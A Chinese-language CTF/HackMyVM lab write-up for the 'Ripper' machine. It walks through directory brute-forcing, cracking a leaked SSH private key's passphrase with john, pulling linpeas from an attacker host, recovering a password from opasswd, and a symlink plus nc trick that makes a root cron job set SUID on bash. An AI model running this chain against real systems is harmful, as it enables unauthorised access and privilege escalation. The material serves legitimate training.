信息收集 1 2 3 4 5 IP=192.168.0.196 nmap -p- $IP 22/tcp open ssh 80/tcp open http
开了两个端口,80 访问看看:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 curl $IP -v * Trying 192.168.0.196:80... * Connected to 192.168.0.196 (192.168.0.196) port 80 > GET / HTTP/1.1 > Host: 192.168.0.196 > User-Agent: curl/8.8.0 > Accept: */* > * Request completely sent off < HTTP/1.1 200 OK < Date: Fri, 18 Oct 2024 02:45:35 GMT < Server: Apache/2.4.38 (Debian) < Last-Modified: Wed, 26 May 2021 13:00:17 GMT < ETag: "39-5c33b39690b03" < Accept-Ranges: bytes < Content-Length: 57 < Content-Type: text/html < Website in maintenance... Come back next month please. * Connection
网站维护中,下个月再来?先不管扫一波目录:
1 gobuster dir -u http://$IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,php3,txt,html
扫完之后啥都没有。按经验,没信息,就是我的字典不够大,我已经用了大字典了,那么我就加点扩展名吧:
1 gobuster dir -u http://$IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
还是没有啥东西。受不了去翻了 WP https://www.bilibili.com/video/BV1eS411c7jp/?vd_source=3aefc8f78d21af4b1df44ab92654ae4e,我了个乖乖,原来raft-large-directories-lowercase.txt 里面没有这个关键词。反而 dirb 的 common.txt 里面有。
1 2 3 gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml /id_rsa.bak (Status: 200) [Size: 1876]
扫到了一个 id_rsa.bak,看看内容:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 curl http://$IP /id_rsa.bak -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDZVZMVwo cfZRVpSIfcOdmiAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDerPt4pwoQ 1Hr7OaU0qZa+npWhHQxp7c9/TTTTukuyHdFeSFlZtUKPOsw+HftTaIuctJSiy9QDovv3I0 Ga+EmEvFDRUX+VQ/tLlHXT3dwdPir6QesuXnzFL7lVB/x4XYjOp1Xi14G+1Q3EWUuePWQ2 tPr40k0k87/RmYThRITfxMVk603wP6ZvGTGN5+0iH2Rq4sfXrO+p3sdVFiH4N/E41agxyS 4maevY02gro1v0GHRDxIh2i9w6FyetXcorIUwktLT/sdbTMDtTHr6tS/wo1TF8m+KIByxD 0ASt505dZ0Ivwu3hmTyKmpZNFYEM1yOK68ukeGEu5s9Hn0/fjGP3AAAD0G71wlLfDrs2vp im79u4YZrUQ5ruNye7XJ/J7UaS+VwuWVeMpsbY3a66minp5e4Q+HSDoBQMf6Q4d9zYSV0u SLIAjtrZH6K990Ixx9B/J3BJHd/zez04sTg9G3kyBKdZACHdonEOE6KwXqM8bRcSK6l4ni J4sLQYNAdN/G0j+8kpt+p6UiRTkg/HSHq/6o9Sv3aQ9XkjTVjb4iuavl4/o36bDFCmqo3u zmzRA6TUsRtQ3HqJJjz73+nurXjFPgqwdG06S+O6W+Uf/jD23bj7bDvtOBd6NR7hvSBzbg A/0ygikZCob1RXR83UNTSIVhSb/UttRJx+aHomYZPIQoFHm1Aa2OpOrsoQcoD87SchJQmN Ah255/d/IL5t2d6A+ez0+P2mYKlrx5LhU+WdTBK96V0kOwMG4h7FVkQZCwC3JBuriMM/9C hOJinGjgqlEnn+k7alY61UInMeg0B3uLr4cyLG7cJhvbcP8lQFrIp8dDonCjT6imIIh10q 6wtJAQIsyuy6LH5Rc3VKClQ/7CpQMEsotIE+LnbJHEWG/98qBzjz3Np+ptt3rLAAvwJvYA tEV88hyGkq4WwyCoFKeuU6eOzrzH7/FRdyMq4+XKuTb53HhlNnvJm7MocBDF9yFTCna0Aw Y21i5ozIdfvcZKyMb4qWuDGboGC7xK4MaoiD6w2JMJdyshL54GqChG+XTprAZEV8ZfsZAL o2ssY4Jyza6u4oTbsWbkVjfo126chPs1Vm9PDQUDy0cByKgFY7vO+1lBL9Um8gb56l0Glq C5UsxFhPE1nsdVa4YNAIu2dlnNjfO/xuo/oa07kHsr29OSD/axb4J5eOFY7en1mvpWuGhE +FyU04ADXr4ElZ9ZUrnLBslEABIAGXhDJ3BvfY4EXcbl0uHViWT3DcLnXknljMXu4lp7y2 ZiMSYo4W8NuTdwlv61kriww5gD++qiQFt71c91yFxqJlAFOUqwpDaTf0wT26NMX2Byj0hL RA40xQaQbna1Rp8j1Y+/PnsG+rr+tfhBXszKJo5fRe/xSqfMykTLFUgCRDub/xn3QBNw5j SaRXpV8E18NYfp0PBz4vpjVzlH+LbN6k09xl0FhicBn8dd12fs0NTlKRvwRvVWIgB7RYJB lZzcYbWzVy8DKI7+MOXmmWF+aaOc/RPytTDntChvmGtBqXKzrYx6HqKTvXpQ/YuuwscsKP 5fo7tGQ+DvUlyyLfk/UM4N8fsm+rsgkV84ogrTDn3CzMeBu6XY0+XWUbmhRL1/9yuWuU0D By0QmXw3P/H1csxt8WRkuNygJz80o= -----END OPENSSH PRIVATE KEY----- curl http://$IP /id_rsa.bak > id_ras ssh-keygen -y -f id_ras @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for 'id_ras' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "id_ras" : bad permissions ┌──(root㉿kali)-[~/Downloads/Ripper] └─# chmod 600 id_ras ┌──(root㉿kali)-[~/Downloads/Ripper] └─# ssh-keygen -y -f id_ras Enter passphrase:
渗透 有密码。破解密码:
1 2 3 4 5 6 7 8 ssh2john id_ras > hash john hash --wordlist=/usr/share/wordlists/rockyou.txt bananas (id_ras) ┌──(root㉿kali)-[~/Downloads/Ripper] └─# ssh-keygen -y -f id_ras Enter passphrase: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDerPt4pwoQ1Hr7OaU0qZa+npWhHQxp7c9/TTTTukuyHdFeSFlZtUKPOsw+HftTaIuctJSiy9QDovv3I0Ga+EmEvFDRUX+VQ/tLlHXT3dwdPir6QesuXnzFL7lVB/x4XYjOp1Xi14G+1Q3EWUuePWQ2tPr40k0k87/RmYThRITfxMVk603wP6ZvGTGN5+0iH2Rq4sfXrO+p3sdVFiH4N/E41agxyS4maevY02gro1v0GHRDxIh2i9w6FyetXcorIUwktLT/sdbTMDtTHr6tS/wo1TF8m+KIByxD0ASt505dZ0Ivwu3hmTyKmpZNFYEM1yOK68ukeGEu5s9Hn0/fjGP3 jack@splunk
拿到了密码,登录:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ssh -i id_ras jack@$IP jack@ripper:~$ id uid=1000(jack) gid=1000(jack) groups =1000(jack) jack@ripper:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync :x:4:65534:sync :/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin jack:x:1000:1000:,,,:/home/jack:/bin/bash helder:x:1001:1001:,,,:/home/helder:/bin/bash
提权 helder user flag 不在这里。简单翻翻没找到啥东西,先上来看看 pspy64:
1 2 2024/10/18 05:21:01 CMD: UID=0 PID=812 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt) " = "$(cat /home/helder/passwd.txt) " ] ; then chmod +s "/usr/bin/$(cat /root/.local/out) " ; fi
home/helder/passwd.txt这个文件我没权限,而且这个 UID 0 的,那么我应该还少一个到 helder 的权限,既然 pspy64 没找到途径,我们再跑下 linpeas.sh:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 wget 192.168.0.30:8000/linpeas.sh sh linpeas.sh |tee out ╔══════════╣ AppArmor binary profiles -rw-r--r-- 1 root root 3129 Feb 10 2019 usr.bin.man ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No
在 opasswd 竟然有一个密码,但是其实 jack 的 ssh 密码我们不是已经知道了吗?不过这个密码是不是 helder 的呢?试试:
1 2 3 jack@ripper:~$ su helder Password: helder@ripper:/home/jack$
果然。user flag 也在。
提权 root 我们先来理一下刚才
1 2 /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt) " = "$(cat /home/helder/passwd.txt) " ] ; then chmod +s "/usr/bin/$(cat /root/.local/out) " ; fi
这段的意思:/root/.local/out,然后比较 /root/.local/helder.txt 和 /home/helder/passwd.txt 的内容,
所以如果如果给 10000 端口写入 bash,那么我们就拿到了 root 的 bash。但是我们如何让 cat /root/.local/helder.txt 和 cat /home/helder/passwd.txt 相等呢?因为目前我们并没有 /root/.local/helder.txt 的权限。
因为比较用的是 cat,所以我们可以用软链接:
1 2 3 4 5 nc -lp 10000 bash ln -s /root/.local/helder.txt /home/helder/passwd.txt
等过了时间一看:
1 2 3 4 5 helder@ripper:~$ls -al /usr/bin/bash -rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash helder@ripper:~$/usr/bin/bash -p helder@ripper:~$id uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups =0(root),1001(helder)
拿到了 root。🎉passwd.txt , 里面的密码就是之前的 Il0V3lipt0n1c3t3a。
总结 有几个点我之前并不知道,这次学到了:
opasswd 文件在 /etc/security/opassed 中,用来存放以前的密码,以便在用户更改密码时,系统可以检查新密码是否与最近使用的旧密码相同,从而防止密码重复使用。本意是为了安全,但是如果有人能读取这个文件,就可以拿到密码。 ln -s 软链接,可以在没有对面文件权限的情况下执行。没有信息的时候,换大字典、换后缀、换其他字典。 另外,HMV 每次想去填 flag 的时候,都会登录过期,可能还是因为我太菜,在 session 过期之前没有搞出来。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 (function ( "use strict" ; setInterval (() => location.reload (), 1000 * 60 * 5 ); })();
另外如果要同步多个油猴脚本要去开启: https://www.tampermonkey.net/faq.php#Q105
